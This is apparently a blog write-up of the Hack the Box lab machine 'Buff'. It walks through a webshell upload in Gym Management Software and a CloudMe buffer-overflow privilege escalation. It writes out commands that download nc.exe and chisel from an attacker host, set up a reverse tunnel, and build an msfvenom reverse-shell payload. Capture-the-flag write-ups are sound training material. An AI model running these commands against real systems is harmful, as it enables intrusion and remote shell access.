Hack the Box: Buff

Buff was an easy machine on Hack the Box. Here’s my take on solving the challenge

Buff

TL;DR: There’s a Gym Management Software running on HTTP port 8080. It’s vulnerable to a unauthenticated PHP file upload and therefore RCE. Locally there’s a CloudMy version running with known buffer overflowe vulnerability which can be exploited to escalate privileges.

Recon

Nmap scan shown only port 8080 open with HTTP server:

Nmap scan

Main page:

Main page

Contact.php reveals an underlying system:

Contact,php

User

There’s a CVE for Gym management Software 1.0. It exploits a possibility to bypass file type filter by setting proper magic bytes and content type to upload a webshell:

Running the script will create a webshell:

Getting a webshell

The webshell can be used to get user flag:

User flag

Privlege escalation

There’s an interesting port open on localhost:

Open port 8888 on localhost

There’s also a CloudMe process running :

# tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        140 K
-- snip --
CloudMe.exe                   6640                            0     37,704 K
-- snip --

Shauns downloads reveal program version:

CloudMe 1.11.2

There’s a CVE with a buffer overflow for this version. It’s listening on the local port 8888, so I need chisel to forward it. Needed files can be downloaded by HTTP from my Kali using powershell:

# powershell -nop -c “Invoke-WebRequest -Uri http://10.10.14.20/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe -Verbose”# powershell -nop -command “iwr “http://10.10.14.20/chisel.exe" -Outfile “C:\xampp\htdocs\gym\upload\chisel.exe””

To get Chisel to work I need to run a server on Kali:

./chisel_1.6.0_linux_386 server -p 4445 -reverse

And the client on victim:

chisel.exe client 10.10.14.20:4445 R:8888:127.0.0.1:8888

I also need to generate a binary payload to run downloaded netcat and return a reverse shell:

msfvenom -a x86 -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.20 443 -e cmd.exe’ -b ‘\x00\x0a\x0d’ -f python

Generated payload must be pasted to the exploit script:

Now running the script should return an admin reverse shell:

Root flag

More from Tellico Lungrevink

Love podcasts or audiobooks? Learn on the go with our new app.

Try Knowable

More from Medium

Disruptive Asia | China 2019
Digital China: Has Australia been spooked?
How to invest in NFTs
Get in 3 Steps your first NFT.
{UPDATE} My Talking Hank Hack Free Resources Generator
TIPSY Vesting — A few days LEFT⏳
What is the vesting solution?
BECOME A CRYPTO AND DEFI MASTER BY JOINING OUR FREE WEBINAR! PrivacySwap defi class.
CDC phishing scam, Peter Cavicchia
How to Stay Safe Online During Covid-10
Simple Cybersecurity Steps in a Complex Time
Get an Echo Show 8 and a Blink Mini security camera for $70–50% off
{UPDATE} 屍速麻將 Hack Free Resources Generator
Tellico Lungrevink

Tellico Lungrevink

Related

Hack the box: BountyHunter Walkthrough
In this article, I will be guiding you to solve HTB’s ‘Bounty Hunter’, .I’ll be explaining in detail, how to capture user flag and system…
Discontinue
Hey guys, couple of month back I have decided to not update this medium blog. The reason behind this is, I write/take my notes in a note…
TRY HACK ME: Write-Up Squid Game-Attacker1
Task 1 Scenario –
Write Up : Forge
Write Up : Forge HTB

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Knowable